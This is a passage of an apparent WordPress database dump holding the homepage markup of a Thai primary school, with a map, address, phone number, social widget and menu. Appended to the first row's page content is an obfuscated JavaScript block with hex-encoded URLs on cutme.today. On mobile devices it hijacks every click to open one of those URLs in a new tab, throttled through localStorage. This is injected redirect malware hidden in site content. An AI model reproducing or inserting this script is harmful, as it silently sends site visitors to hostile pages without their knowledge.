left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 045-660157</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"50\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:27:39','2024-07-27 05:27:39','',14,'http://pakhaeng.ssk.in.th/?p=156',0,'revision','',0),
(157,1,'2024-07-27 12:27:54','2024-07-27 05:27:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem 